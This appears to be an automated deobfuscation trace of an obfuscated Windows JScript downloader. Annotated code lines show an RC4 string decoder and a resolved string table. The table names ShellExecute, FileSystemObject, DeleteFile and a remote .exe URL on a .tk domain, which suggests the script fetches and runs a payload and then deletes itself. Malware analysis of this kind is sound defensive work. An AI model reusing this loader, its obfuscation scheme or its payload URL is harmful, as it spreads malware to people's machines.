                                                                                                                                                                                                                                                                                      • _0x1c1988("279BGVghm") ➔ undefined
                                                                                                                                                                                                                                                                                      • _0x1c1988("vcFcV8kjWRZdHmk4WROea0xcUa") ➔ "T'\xbf\x89\xbc\xc4\xb8\xba\x04\x03E\xb8"
                                                                                                                                                                                                                                                                                      • _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                                      • _0x1c1988("W4BcLCo0oJRcS8kdW4SaWO1/WQaN") ➔ "\xc6\x95\xf4::\xb3\x83\xcb\x00\x8d\x7f\xa0'"
                                                                                                                                                                                                                                                                                      • _0x1c1988("Type") ➔ undefined
                                                                                                                                                                                                                                                                                      • _0x1c1988("WOZcHCkvkCo+WOXZnuxcKKbM") ➔ "\x8c\x85\x95)\xfe\x8cs5E\x92@f"
                                                                                                                                                                                                                                                                                      • _0x1c1988("Scripting.FileSystemObject") ➔ undefined
                                                                                                                                                                                                                                                                                      • _0x1c1988("Scripting.FileSystemObject") ➔ undefined
                                                                                                                                                                                                                                                                                      • _0x1c1988("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe") ➔ undefined
                                                                                                                                                                                                                                                                                      • _0x1c1988("995898DfgeKn") ➔ undefined
                                                                                                                                                                                                                                                                                      119
                                                                                                                                                                                                                                                                                      var _0x249fdc;
                                                                                                                                                                                                                                                                                        120
                                                                                                                                                                                                                                                                                        for ( _0x249fdc = 0x0 ; _0x249fdc < 0x100 ; _0x249fdc ++ )
                                                                                                                                                                                                                                                                                          121
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                            122
                                                                                                                                                                                                                                                                                            _0x540d16[_0x249fdc] = _0x249fdc;
                                                                                                                                                                                                                                                                                              123
                                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                                124
                                                                                                                                                                                                                                                                                                for ( _0x249fdc = 0x0 ; _0x249fdc < 0x100 ; _0x249fdc ++ )
                                                                                                                                                                                                                                                                                                  125
                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                    126
                                                                                                                                                                                                                                                                                                    _0x7b0d9d = ( _0x7b0d9d + _0x540d16[_0x249fdc] + _0x8f1407[_0x3fff08 ( 0xf8, 'dX[e' ) ] ( _0x249fdc % _0x8f1407[_0x4eb5d1 ( 0xdf ) ] ) ) % 0x100, _0x582129 = _0x540d16[_0x249fdc], _0x540d16[_0x249fdc] = _0x540d16[_0x7b0d9d], _0x540d16[_0x7b0d9d] = _0x582129;
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    • _0x3fff08(248,"dX[e") ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                    • _0x4eb5d1(223) ➔ "length"
                                                                                                                                                                                                                                                                                                    127
                                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                                      128
                                                                                                                                                                                                                                                                                                      _0x249fdc = 0x0, _0x7b0d9d = 0x0;
                                                                                                                                                                                                                                                                                                        129
                                                                                                                                                                                                                                                                                                        for ( var _0x287833 = 0x0 ; _0x287833 < _0x29b9bf[_0x3fff08 ( 0xd4, 'Uvs9' ) ] ; _0x287833 ++ )
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        • _0x3fff08(212,"Uvs9") ➔ "length"
                                                                                                                                                                                                                                                                                                        130
                                                                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                                                                          131
                                                                                                                                                                                                                                                                                                          _0x249fdc = ( _0x249fdc + 0x1 ) % 0x100, _0x7b0d9d = ( _0x7b0d9d + _0x540d16[_0x249fdc] ) % 0x100, _0x582129 = _0x540d16[_0x249fdc], _0x540d16[_0x249fdc] = _0x540d16[_0x7b0d9d], _0x540d16[_0x7b0d9d] = _0x582129, _0x19cf9c += String[_0x3fff08 ( 0xcc, 'pkRk' ) ] ( _0x29b9bf[_0x4eb5d1 ( 0x100 ) ] ( _0x287833 ) ^ _0x540d16[( _0x540d16[_0x249fdc] + _0x540d16[_0x7b0d9d] ) % 0x100] );
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          • _0x3fff08(204,"pkRk") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                          • _0x4eb5d1(256) ➔ "charCodeAt"
                                                                                                                                                                                                                                                                                                          132
                                                                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                                                                            133
                                                                                                                                                                                                                                                                                                            return _0x19cf9c;
                                                                                                                                                                                                                                                                                                              134
                                                                                                                                                                                                                                                                                                              };
                                                                                                                                                                                                                                                                                                                135
                                                                                                                                                                                                                                                                                                                _0x5b6c['AOWVVX'] = _0x229c24, _0x573185 = arguments, _0x5b6c[_0x21482c ( 0xe4, 'Uvs9' ) ] = ! ! [];
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                • _0x21482c(228,"Uvs9") ➔ "qCVKfY"
                                                                                                                                                                                                                                                                                                                136
                                                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                                                  137
                                                                                                                                                                                                                                                                                                                  var _0x5f031d = _0x3d4abd[0x0], _0x41a554 = _0x10ff05 + _0x5f031d, _0x465855 = _0x573185[_0x41a554];
                                                                                                                                                                                                                                                                                                                    138
                                                                                                                                                                                                                                                                                                                    return ! _0x465855 ? ( _0x5b6c[_0x562b2c ( 0xd0 ) ] === undefined && ( _0x5b6c['RzXUsr'] = ! ! [] ), _0x325444 = _0x5b6c[_0x21482c ( 0x108, 'oE&(' ) ] ( _0x325444, _0x54c045 ), _0x573185[_0x41a554] = _0x325444 ) : _0x325444 = _0x465855, _0x325444;
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("279BGVghm","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("vcFcV8kjWRZdHmk4WROea0xcUa","m*X5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02"
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki"
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("W4BcLCo0oJRcS8kdW4SaWO1/WQaN","W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1"
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("Type","4(*W") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("WOZcHCkvkCo+WOXZnuxcKKbM","m*X5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc"
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","RY1%") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("Scripting.FileSystemObject","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("https://tgc8x.tk/tt/VNZVNCXKKJSF.exe","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                                                    • _0x562b2c(208) ➔ "RzXUsr"
                                                                                                                                                                                                                                                                                                                    • _0x21482c(264,"oE&(") ➔ "AOWVVX"
                                                                                                                                                                                                                                                                                                                    • function (_0x10ff05, _0x54c045).AOWVVX("995898DfgeKn","m*X5") ➔ undefined
                                                                                                                                                                                                                                                                                                                    139
                                                                                                                                                                                                                                                                                                                    }, _0x5b6c ( _0x573185, _0x30822b );
                                                                                                                                                                                                                                                                                                                      140
                                                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                                                        141
                                                                                                                                                                                                                                                                                                                        function _0xe99d(_0x304024, _0x5125dd) {
                                                                                                                                                                                                                                                                                                                        • _0xe99d(234) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(260) ➔ "push"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(234) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(260) ➔ "76392yWuOtG"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(233) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(234) ➔ "421620Dulpsf"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(260) ➔ "W73dVr7dRxtcHSkIW4xcK27cLSoWWOa"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(233) ➔ "W4ZdJrRdRue"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(234) ➔ "282elZIVv"
                                                                                                                                                                                                                                                                                                                        • _0xe99d(260) ➔ "5991OPUtAM"
                                                                                                                                                                                                                                                                                                                        142
                                                                                                                                                                                                                                                                                                                        var _0x3974d = _0x3974 ( );
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                        • _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
